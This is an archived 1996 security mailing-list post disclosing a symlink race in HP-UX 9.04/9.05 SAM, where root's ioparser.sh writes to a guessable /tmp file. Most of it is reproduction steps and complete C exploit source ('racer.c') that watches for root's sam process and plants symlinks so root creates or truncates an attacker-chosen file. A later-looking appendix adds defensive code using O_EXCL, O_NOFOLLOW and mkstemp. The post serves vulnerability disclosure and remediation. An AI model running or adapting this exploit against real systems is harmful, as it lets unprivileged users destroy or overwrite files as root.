HP-UX SAM hole...

John W. Jacobi (jjacobi@nova.umuc.edu)
Wed, 25 Sep 1996 08:07:46 -0700

I never saw this distributed to listserv recipients, that is why I have sent it again. Could you please repost.

Hi all,

Could someone confirm this for me or tell me if I am mistaken??? Perhaps suggest an easy way to prevent this???

I have discovered something that any user can exploit to cause root to create or truncate files on the system when root runs sam. I have put the source code that I wrote to verify it below.

Version: HP-UX 9.04 & 9.05 on 9000/700 & 9000/800

My basic question is: "Is there any more global and easy way to prevent this from happening aside from modifying the affected scripts? As I have found that this exists in other places than just sam?" Perhaps something rather generic on how root follows sym links? Maybe I'm just pipe dreaming...

How it worked for me:

What really happens is that sam is a script and it calls another script named ioparser.sh which writes to a temporary file in /tmp whose name is easily guessable. Basically, if you see sam pop up in the process table, create a bunch of sym links of the format /tmp/<hostname>.<pid> where hostname is the hostname and pid is a number beginning at sam's PID + 1 on up to some value like sam's PID + 50. When the sam script calls ioparser.sh, it redirects output to a file like /tmp/<hostname>.$$ (the shell PID), follows the link, and as root creates or truncates what the link points to.

Any suggestions on what to do, however simple they might be, would be greatly appreciated.

Thanks

How to do it:

Go to your HP 9.04/5 system first.

1. Log into your system as a normal user.
2. Compile the program below, making any changes if you need to. (You shouldn't need to.)
3. Log in on another terminal, become root and ensure that sam is not currently executing.
4. As the normal user login, run the program that you compiled in step 2.
5. On the root login session, run sam.
6. Look at the target file.
/* Code to exploit race of sam calling ioparser.sh
   It will usually cause the ioparser.sh script run by root to follow
   the sym links created here to create or truncate TARGET_FILENAME as
   root. It ain't pretty and may not always work, but usually does.
   Compile on HP9000/[700/800] 9.04[5] with the command:
      cc racer.c -o racer -Ae
*/
#include <stdio.h>
#include <stdlib.h>         /* system(), atoi(), exit() */
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <symlink.h>

#define PROC_TO_LOOK_FOR "sam"          /* The process to look for in ps */
#define TARGET_FILENAME  "/check_this"  /* File that is created or trunc'ed */
#define NUM_SYM_LINKS    50             /* Increase this for systems that fork() a lot */

int main(void)
{
    char ps_buf[65536];   /* ps data buffer */
    char *line;           /* a pointer into ps_buf */
    char f1[80];          /* buffer space for the sym link name */
    char hostname[32];    /* buffer space to hold hostname, duh */
    int  fd;              /* fd is for the pipe */
    int  ext;             /* the extension to place on the symlink (pid) */
    int  loop;            /* Dumb loop variable, suggestions ??? */

    unlink("ps_fifo");                            /* Why not */
    mkfifo("ps_fifo", S_IRUSR | S_IWUSR);         /* Need this */
    fd = open("ps_fifo", O_RDONLY | O_NONBLOCK);  /* You read the pipe */
    gethostname(hostname, 32);                    /* gets the hostname just like ioparser.sh !!! */

    printf("Looking for process %s, will exploit filename %s\n",
           PROC_TO_LOOK_FOR, TARGET_FILENAME);

    /* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */
    while (1) {
        system("/bin/ps -u 0 > ps_fifo");
        read(fd, ps_buf, 65536);
        if ((line = strstr(ps_buf, PROC_TO_LOOK_FOR)) != NULL) {
            /* back up to the start of the ps line, then cut out the PID field */
            while (*line != '\n') {
                line--;
            }
            line += 2;
            line[5] = '\0';
            ext = atoi(line);
            for (loop = 1; loop <= NUM_SYM_LINKS; loop++) {
                sprintf(f1, "/tmp/%s.%d", hostname, ext + loop);
                symlink(TARGET_FILENAME, f1);
            }
            while ((access(TARGET_FILENAME, F_OK)) < 0)
                ;
            printf("%s has run, wait a few seconds and check %s\n",
                   PROC_TO_LOOK_FOR, TARGET_FILENAME);
            unlink("ps_fifo");
            exit(0);
        }
    }
}
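The weak step described in the post is a root shell redirecting to a guessable /tmp/<hostname>.$$ name and following whatever symlink sits there. The following is an added example, not part of the original post or of HP's ioparser.sh, showing the two fixes a maintainer would apply: open the file with O_CREAT|O_EXCL|O_NOFOLLOW so a planted link makes the open fail instead of truncating its target, and let mkstemp() choose an unpredictable name atomically. The scratch directory, the "host.1234" link name and the "check_this" target are constructed for the demo.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Replacement for `> /tmp/$host.$$`: never follow a symlink at the final
 * component and never reuse an existing name. A planted link yields -1
 * (errno EEXIST or ELOOP) and the link target is left untouched. */
int open_nofollow_excl(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred fix: unpredictable name, created atomically with O_EXCL, mode 0600.
 * Writes the chosen path to out; returns the fd or -1. */
int make_private_tmp(const char *dir, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/ioparser.XXXXXX", dir);
    if (n < 0 || (size_t)n >= outlen) { errno = ENAMETOOLONG; return -1; }
    return mkstemp(out);
}

/* Constructed scenario: plant a guessable link in a private scratch dir the
 * way the racer does, then check the hardened open refuses it and the
 * mkstemp path succeeds. Returns 1 when both defences hold. */
int demo_defence_holds(void)
{
    char dir[] = "/tmp/samdemo.XXXXXX";           /* constructed scratch dir */
    char link_path[PATH_MAX], target[PATH_MAX], tmp[PATH_MAX];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/check_this", dir);
    snprintf(link_path, sizeof link_path, "%s/host.1234", dir);
    if (symlink(target, link_path) != 0) return 0;

    int fd = open_nofollow_excl(link_path);        /* must fail: it is a symlink */
    int held = (fd < 0) && (access(target, F_OK) != 0); /* target never created */
    if (fd >= 0) close(fd);

    int fd2 = make_private_tmp(dir, tmp, sizeof tmp); /* must succeed */
    held = held && fd2 >= 0;
    if (fd2 >= 0) { close(fd2); unlink(tmp); }
    unlink(link_path); unlink(target); rmdir(dir);
    return held;
}

int main(void) { return demo_defence_holds() ? 0 : 1; }
```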